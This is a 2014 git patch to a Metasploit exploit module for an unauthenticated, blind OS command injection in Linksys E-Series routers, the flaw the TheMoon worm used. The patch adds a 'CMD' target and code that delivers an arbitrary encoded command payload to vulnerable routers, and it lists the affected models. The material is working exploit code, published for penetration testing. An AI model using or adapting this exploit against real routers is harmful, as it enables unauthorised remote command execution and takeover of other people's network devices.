From 2935f4f5627a251ba6a24fb535323eadc56ce223 Mon Sep 17 00:00:00 2001
From: Michael Messner <devnull@s3cur1ty.de>
Date: Mon, 24 Feb 2014 18:12:23 +0100
Subject: [PATCH] CMD target

---
 .../linux/http/linksys_themoon_exec_echo.rb   | 27 +++++++++++++++++--
 1 file changed, 25 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/linux/http/linksys_themoon_exec_echo.rb b/modules/exploits/linux/http/linksys_themoon_exec_echo.rb
index cedc9e5b44..33261f342c 100644
--- a/modules/exploits/linux/http/linksys_themoon_exec_echo.rb
+++ b/modules/exploits/linux/http/linksys_themoon_exec_echo.rb
@@ -16,8 +16,11 @@ class Metasploit3 < Msf::Exploit::Remote
       'Name'        => 'Linksys E-Series TheMoon Remote Command Injection',
       'Description' => %q{
           Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
-        injection. This vulnerability was used from the so called "TheMoon" worm. There
-        are many Systems that might be vulnerable:
+        injection. Since it is a blind os command injection vulnerability, there is no
+        output for the executed command when using the cmd generic payload. A ping
+        command against a controlled system could be used for testing purposes. This
+        vulnerability was used from the so called "TheMoon" worm. There are many Systems
+        that might be vulnerable:
         E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900. This
         module was tested against a E1500 v1.0.5.
       },
@@ -46,6 +49,12 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'Targets'        =>
         [
+          [ 'CMD',
+            {
+            'Arch' => ARCH_CMD,
+            'Platform' => 'unix'
+            }
+          ],
           [ 'Linux mipsel Payload',
             {
             'Arch' => ARCH_MIPSLE,
@@ -107,6 +116,20 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
     end
 
+    if target.name =~ /CMD/
+      if not (datastore['CMD'])
+        fail_with(Failure::BadConfig, "#{peer} - Only the cmd/generic payload is compatible")
+      end
+      cmd = payload.encoded
+      res = execute_command(cmd,"0")
+      if (!res)
+        fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")
+      else
+        print_status("#{peer} - Blind Exploitation - unknown Exploitation state")
+      end
+      return
+    end
+
     execute_cmdstager(
       :linemax => 26
     )